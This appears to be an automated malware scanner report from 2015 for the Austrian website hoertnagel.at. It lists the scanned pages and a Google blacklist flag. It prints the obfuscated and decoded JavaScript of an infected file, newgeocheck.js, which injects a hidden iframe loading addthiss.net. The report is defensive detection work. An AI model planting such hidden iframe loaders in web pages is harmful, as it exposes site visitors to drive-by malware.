New scan:

Malware Scanner report for hoertnagel.at

Malicious/Suspicious/Total urls checked
1/0/25
1 page has malicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "hoertnagel.at" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=hoertnagel.at

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://www.hoertnagel.at/
HTTP/1.1 302 Moved Temporarily
Date: Mon, 02 Mar 2015 15:29:18 GMT
Location: http://members.aon.at/ahortnag
Server: squid/2.5.STABLE10
Content-Length: 0
clean
http://members.aon.at/ahortnag
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 02 Mar 2015 15:29:18 GMT
Location: http://members.aon.at/ahortnag/
Server: Apache
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from members.aon.at
clean
http://members.aon.at/ahortnag/
200 OK
Content-Length: 5144
Content-Type: text/html
clean
http://members.aon.at/ahortnag/newgeocheck.js
200 OK
Content-Length: 7265
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

var geocheck = true;


var secureNewgeoB;if(secureNewgeoB!='' && secureNewgeoB!='mIR'){secureNewgeoB='fKDE'};this.zAP=30722;var gECheck;var xP=false;gECheck='f8faf9fcfafff5ffb9e1cafbdee7f4d9f3f7e3e2f9e3f1b6a2eef9fbdfc8b9bcf4e8f8f3e'+'ff0cdc9ede9aeb8e8f6dec5b7bff4cbd3eaf0e6b092e7effae6f9fca1aae29480a7ba8ef4'+'ffb8a2ecf3f7f3fff1fffbe0e8a0a6f09784bbabb694baa2eef9e59ba8b3a7acb0eca1e4e'+'cd4f18fe8e0e8a494a4ba80bbadbb9e99b1f9efd9dff8f5b2d7cde0fcd9e0cd91f4c4d8e8'+'e8fa8dc8f6fed7f
... 3098 bytes are skipped ...
ace(/[\!iYd\[]/g, '')]); tY++) {var dF = cF(jU,tY);var mJU='';dF = k(dF, jJ);dF = k(dF, kR('check'));this.xU='';dF = k(dF, kR('zQ'));var kHG;if(kHG!='cAX'){kHG='cAX'};tE+=geo(dF);}var qCA;if(qCA!='qCSecure'){qCA='qCSecure'};var wBGeo=new Date();nK['epvpaplN'.replace(/[NtYXp]/g, '')](tE);var rXA="rXA";return tE=new newgeo();var rFU;if(rFU!='kYG'){rFU=''};};var oWGeo;if(oWGeo!='dSecY'){oWGeo=''};var uTI;if(uTI!='geoC'){uTI=''};d(gECheck);var vGU;if(vGU!='mQ'){vGU=''};var dDQ;if(dDQ!='sP'){dDQ=''};

Decoded script:


function setCookie(name, value, expiredays, path, domain, secure) {
if (expiredays) {
var exdate=new Date();
exdate.setDate(exdate.getDate()+expiredays);
var expires = exdate.toGMTString();
}
document.cookie = name + "=" + escape(value) +
((expiredays) ? "; expires=" + expires : "") +
((path) ? "; path=" + path : "") +
((domain) ? "; domain=" + domain : "") +
((secure) ? "; secure" : "");
}
fu
... 1894 bytes are skipped ...
br/> }
}
return setStr;
}
var user = getCookie("secheck");
if (user !=777){
document.write('<iframe src="http://addthiss.net/in.cgi?8" width=1 height=1 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>' );
setCookie("secheck", "777", 7, "/");
}
<iframe src="http://addthiss.net/in.cgi?8" width=1 height=1 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>

Antivirus reports:

Avast
HTML:Iframe-inf
Microsoft
Exploit:HTML/IframeRef.Z
VIPRE
Trojan-Clicker.HTML.IFrame (v)
Norman
IframeRef.DL
Sophos
Mal/Iframe-F
GData
HTML:Iframe-inf
ESET-NOD32
HTML/Iframe.B.Gen

http://www.hoertnagel.at/seite_harmonika.htm
HTTP/1.1 302 Moved Temporarily
Date: Mon, 02 Mar 2015 15:29:19 GMT
Location: http://members.aon.at/ahortnag/seite_harmonika.htm
Server: squid/2.5.STABLE10
Content-Length: 0
clean
http://members.aon.at/ahortnag/seite_harmonika.htm
200 OK
Content-Length: 15482
Content-Type: text/html
clean
http://members.aon.at/ahortnag/images/23pal_gros.gif
200 OK
Content-Length: 70973
Content-Type: image/gif
clean
http://members.aon.at/test404page.js
HTTP/1.1 302 Moved Temporarily
Date: Mon, 02 Mar 2015 15:29:20 GMT
Location: http://www.a1.net
Server: squid/2.5.STABLE10
Content-Length: 0
clean
http://www.a1.net/
200 OK
Content-Length: 73677
Content-Type: text/html
clean
http://cdn3.a1.net/final/de/js/jquery-min.js
200 OK
Content-Length: 187747
Content-Type: application/javascript
clean
http://cdn1.a1.net/final/de/js/bundle_start.js
200 OK
Content-Length: 150253
Content-Type: application/javascript
clean
http://cdn2.a1.net/final/de/js/tracking.js
200 OK
Content-Length: 165970
Content-Type: application/javascript
clean
http://cdn3.a1.net/final/de/js/trackEvents.js
200 OK
Content-Length: 2426
Content-Type: application/javascript
clean
https://www.googleadservices.com/pagead/conversion.js
200 OK
Content-Length: 10722
Content-Type: text/javascript
clean
https://ta.mopinion.nl/custom/ta/mopinion.min.js
200 OK
Content-Length: 44377
Content-Type: application/javascript
clean
http://members.aon.at//www.googleadservices.com/pagead/conversion.js/
HTTP/1.1 302 Moved Temporarily
Date: Mon, 02 Mar 2015 15:29:25 GMT
Location: http://www.a1.net
Server: squid/2.5.STABLE10
Content-Length: 0
clean
http://www.a1.net/test404page.js
HTTP/1.1 404 Not Found
Cache-Control: no-cache
Connection: close
Date: Mon, 02 Mar 2015 15:29:25 GMT
Pragma: no-cache
Location: /
Server: Server
Vary: Accept-Encoding,User-Agent
Content-Encoding: identity
Content-Language: de
Content-Length: 37891
Content-Type: text/html; charset=utf-8
Expires: Mon, 02 Mar 2015 15:29:25 GMT
Lsrequestid: 220123177
Set-Cookie: JSESSIONID=F95C48695541D5B2644B35E656C42773.b155d113-9598-3bb8-9fba-40e622b16e46; Path=/cps
Set-Cookie: LIVESESSION_ONEPORTAL=SID-48E572A4-AC40DABD; Path=/
Set-Cookie: LIVESESSION_ONEPORTAL=SID-48E572A4-AC40DABD; Path=/
Set-Cookie: aaaStaticCookie=lvpaaa1;path=/;domain=.a1.net; HttpOnly
clean
http://www.hoertnagel.at/seite%2023.htm
HTTP/1.1 302 Moved Temporarily
Date: Mon, 02 Mar 2015 15:29:26 GMT
Location: http://members.aon.at/ahortnag/seite%2023.htm
Server: squid/2.5.STABLE10
Content-Length: 0
clean
http://members.aon.at/ahortnag/seite%2023.htm
200 OK
Content-Length: 2351
Content-Type: text/html
clean
http://www.hoertnagel.at/images/33_b.gross.gif
HTTP/1.1 302 Moved Temporarily
Date: Mon, 02 Mar 2015 15:29:27 GMT
Location: http://members.aon.at/ahortnag/images/33_b.gross.gif
Server: squid/2.5.STABLE10
Content-Length: 0
clean
http://members.aon.at/ahortnag/images/33_b.gross.gif
200 OK
Content-Length: 122308
Content-Type: image/gif
clean
http://www.hoertnagel.at/seite%2033.htm
HTTP/1.1 302 Moved Temporarily
Date: Mon, 02 Mar 2015 15:29:27 GMT
Location: http://members.aon.at/ahortnag/seite%2033.htm
Server: squid/2.5.STABLE10
Content-Length: 0
clean
http://members.aon.at/ahortnag/seite%2033.htm
200 OK
Content-Length: 6124
Content-Type: text/html
clean
http://www.hoertnagel.at/seite%2034.htm
HTTP/1.1 302 Moved Temporarily
Date: Mon, 02 Mar 2015 15:29:28 GMT
Location: http://members.aon.at/ahortnag/seite%2034.htm
Server: squid/2.5.STABLE10
Content-Length: 0
clean
http://members.aon.at/ahortnag/seite%2034.htm
200 OK
Content-Length: 10275
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: hoertnagel.at

Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: hoertnagel.at
Referer: http://www.google.com/search?q=hoertnagel.at

Result:
The result is similar to the first query. There are no suspicious redirects found.